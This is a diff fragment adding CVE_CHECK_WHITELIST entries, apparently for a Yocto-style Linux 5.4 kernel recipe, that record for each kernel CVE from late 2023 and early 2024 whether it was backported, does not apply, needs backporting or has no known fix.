+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52444"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52445"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52446"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52447"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52448"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52449"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52450"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52451"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52452"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52453"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52454"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52455"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52456"
+
+# fixed-version: only affects 6.1rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52457"
+
+# CVE-2023-52458 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52459"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52460"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52461"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52462"
+
+# fixed-version: only affects 5.8rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52463"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52464"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52465"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52467"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52468"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52469"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52470"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52471"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52472"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52473"
+
+# CVE-2023-52474 needs backporting (fixed from 6.4rc1)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52475"
+
+# CVE-2023-52476 needs backporting (fixed from 6.6rc6)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52477"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52478"
+
+# CVE-2023-52479 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52480 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52481 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52482 needs backporting (fixed from 6.6rc4)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52483"
+
+# CVE-2023-52484 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52485 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52486"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52487"
+
+# CVE-2023-52488 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52489 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52490"
+
+# CVE-2023-52491 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52492"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52493"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52494"
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52495"
+
+# CVE-2023-52497 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52498 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52499"
+
+# CVE-2023-52500 needs backporting (fixed from 6.6rc2)
+
+# CVE-2023-52501 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52502"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52503"
+
+# cpe-stable-backport: Backported in 5.4.270
+CVE_CHECK_WHITELIST += "CVE-2023-52504"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52505"
+
+# CVE-2023-52506 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52507"
+
+# CVE-2023-52508 needs backporting (fixed from 6.6rc2)
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52509"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-52510"
+
+# CVE-2023-52511 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52512"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52513"
+
+# CVE-2023-52515 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52516 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52517 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52518"
+
+# CVE-2023-52519 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52520"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52522"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52523"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52524"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52525"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52526"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52527"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52528"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52529"
+
+# CVE-2023-52530 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52531 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52532 needs backporting (fixed from 6.6rc5)
+
+# CVE-2023-52559 needs backporting (fixed from 6.6rc5)
+
+# fixed-version: only affects 5.16rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52560"
+
+# CVE-2023-52561 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 6.0rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52562"
+
+# CVE-2023-52563 needs backporting (fixed from 6.6rc3)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52564"
+
+# CVE-2023-52565 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52566"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52567"
+
+# CVE-2023-52568 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52569 needs backporting (fixed from 6.6rc2)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52570"
+
+# CVE-2023-52571 needs backporting (fixed from 6.6rc4)
+
+# CVE-2023-52572 needs backporting (fixed from 6.6rc3)
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52573"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52574"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52575"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52576"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52577"
+
+# cpe-stable-backport: Backported in 5.4.258
+CVE_CHECK_WHITELIST += "CVE-2023-52578"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52580"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52581"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52582"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52583"
+
+# CVE-2023-52584 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52585 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52586 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52587"
+
+# CVE-2023-52588 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52589 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52590 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52591 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52593 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52594"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52595"
+
+# CVE-2023-52596 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52598"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52600"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52602"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52603"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52604"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52606"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52607"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52608"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52609"
+
+# CVE-2023-52610 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52611"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-52612"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52613"
+
+# CVE-2023-52614 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52615"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52616"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52617"
+
+# CVE-2023-52618 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52619"
+
+# CVE-2023-52620 needs backporting (fixed from 6.4)
+
+# CVE-2023-52621 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52622"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52623"
+
+# CVE-2023-52624 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52625 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.7rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52626"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52627"
+
+# CVE-2023-52628 needs backporting (fixed from 6.6rc1)
+
+# CVE-2023-52629 needs backporting (fixed from 6.6rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52630"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52631"
+
+# CVE-2023-52632 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52633 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52634 needs backporting (fixed from 6.8rc1)
+
+# CVE-2023-52635 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-52636"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2023-52637"
+
+# CVE-2023-52638 needs backporting (fixed from 6.8rc5)
+
+# CVE-2023-52639 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52640 needs backporting (fixed from 6.8rc4)
+
+# CVE-2023-52641 needs backporting (fixed from 6.8rc4)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5345"
+
+# fixed-version: only affects 6.2 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5633"
+
+# cpe-stable-backport: Backported in 5.4.259
+CVE_CHECK_WHITELIST += "CVE-2023-5717"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-5972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6039"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2023-6040"
+
+# fixed-version: only affects 6.6rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6111"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6121"
+
+# fixed-version: only affects 5.7rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6176"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6200"
+
+# CVE-2023-6238 has no known resolution
+
+# CVE-2023-6240 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-6270"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6356"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6531"
+
+# CVE-2023-6535 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6536"
+
+# CVE-2023-6546 needs backporting (fixed from 6.5rc7)
+
+# CVE-2023-6560 needs backporting (fixed from 6.7rc4)
+
+# cpe-stable-backport: Backported in 5.4.266
+CVE_CHECK_WHITELIST += "CVE-2023-6606"
+
+# CVE-2023-6610 needs backporting (fixed from 6.7rc7)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6622"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6679"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2023-6817"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2023-6915"
+
+# cpe-stable-backport: Backported in 5.4.264
+CVE_CHECK_WHITELIST += "CVE-2023-6931"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2023-6932"
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2023-7042"
+
+# cpe-stable-backport: Backported in 5.4.235
+CVE_CHECK_WHITELIST += "CVE-2023-7192"
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0193"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0340"
+
+# fixed-version: only affects 6.2rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0443"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0562"
+
+# CVE-2024-0564 has no known resolution
+
+# CVE-2024-0565 needs backporting (fixed from 6.7rc6)
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0582"
+
+# cpe-stable-backport: Backported in 5.4.263
+CVE_CHECK_WHITELIST += "CVE-2024-0584"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-0607"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0639"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-0641"
+
+# cpe-stable-backport: Backported in 5.4.267
+CVE_CHECK_WHITELIST += "CVE-2024-0646"
+
+# cpe-stable-backport: Backported in 5.4.243
+CVE_CHECK_WHITELIST += "CVE-2024-0775"
+
+# cpe-stable-backport: Backported in 5.4.271
+CVE_CHECK_WHITELIST += "CVE-2024-0841"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-1085"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-1086"
+
+# CVE-2024-1151 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-1312 needs backporting (fixed from 6.5rc4)
+
+# CVE-2024-21803 has no known resolution
+
+# CVE-2024-2193 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-22099"
+
+# CVE-2024-22386 has no known resolution
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-22705"
+
+# cpe-stable-backport: Backported in 5.4.255
+CVE_CHECK_WHITELIST += "CVE-2024-23196"
+
+# CVE-2024-23307 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-23848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-23849"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-23850"
+
+# CVE-2024-23851 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-24855 needs backporting (fixed from 6.5rc2)
+
+# CVE-2024-24857 has no known resolution
+
+# CVE-2024-24858 has no known resolution
+
+# CVE-2024-24859 has no known resolution
+
+# CVE-2024-24860 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-24861 needs backporting (fixed from 6.9rc1)
+
+# CVE-2024-24864 has no known resolution
+
+# CVE-2024-25739 has no known resolution
+
+# CVE-2024-25740 has no known resolution
+
+# CVE-2024-25741 has no known resolution
+
+# CVE-2024-25744 needs backporting (fixed from 6.7rc5)
+
+# fixed-version: only affects 6.5rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26581"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26582"
+
+# fixed-version: only affects 5.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26583"
+
+# CVE-2024-26584 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26585 needs backporting (fixed from 6.8rc5)
+
+# CVE-2024-26586 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26587"
+
+# fixed-version: only affects 6.1rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26588"
+
+# CVE-2024-26589 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26590"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26591"
+
+# CVE-2024-26592 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26593"
+
+# CVE-2024-26594 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26595 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26596"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26597"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26598"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26599"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26600"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26601"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26602"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26603"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26604"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26605"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26606"
+
+# CVE-2024-26607 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26608"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26610"
+
+# fixed-version: only affects 6.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26611"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26612"
+
+# CVE-2024-26614 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26615"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26616"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26617"
+
+# fixed-version: only affects 6.5rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26618"
+
+# fixed-version: only affects 6.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26619"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26620"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26621"
+
+# CVE-2024-26622 needs backporting (fixed from 6.8rc7)
+
+# CVE-2024-26623 needs backporting (fixed from 6.8rc3)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26625"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26626"
+
+# CVE-2024-26627 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26629"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26630"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26631"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26632"
+
+# cpe-stable-backport: Backported in 5.4.268
+CVE_CHECK_WHITELIST += "CVE-2024-26633"
+
+# fixed-version: only affects 6.6rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26634"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26635"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26636"
+
+# fixed-version: only affects 6.7 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26637"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26638"
+
+# fixed-version: only affects 6.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26639"
+
+# CVE-2024-26640 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26641 needs backporting (fixed from 6.8rc3)
+
+# CVE-2024-26642 needs backporting (fixed from 6.8)
+
+# fixed-version: only affects 6.5rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26643"
+
+# CVE-2024-26644 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26645"
+
+# CVE-2024-26646 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26647 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26648 needs backporting (fixed from 6.8rc1)
+
+# fixed-version: only affects 6.3rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26649"
+
+# CVE-2024-26650 needs backporting (fixed from 6.8rc2)
+
+# cpe-stable-backport: Backported in 5.4.273
+CVE_CHECK_WHITELIST += "CVE-2024-26651"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26652"
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26653"
+
+# CVE-2024-26654 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26655 needs backporting (fixed from 6.9rc2)
+
+# CVE-2024-26656 needs backporting (fixed from 6.9rc1)
+
+# fixed-version: only affects 6.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26657"
+
+# CVE-2024-26658 needs backporting (fixed from 6.8rc1)
+
+# CVE-2024-26659 needs backporting (fixed from 6.8rc3)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26660"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26661"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26662"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26663"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26664"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26665"
+
+# fixed-version: only affects 6.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26666"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26667"
+
+# CVE-2024-26668 needs backporting (fixed from 6.8rc2)
+
+# CVE-2024-26669 needs backporting (fixed from 6.8rc2)
+
+# fixed-version: only affects 6.6rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26670"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26671"
+
+# CVE-2024-26672 needs backporting (fixed from 6.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26673"
+
+# fixed-version: only affects 6.4rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2024-26674"
+
+# cpe-stable-backport: Backported in 5.4.269
+CVE_CHECK_WHITELIST += "CVE-2024-26675"
+
+# CVE-2024-26676 needs backporting (fixed from 6.8rc4)
+
+# CVE-2024-26677 needs backporting (fixed from 6.8rc4)
+
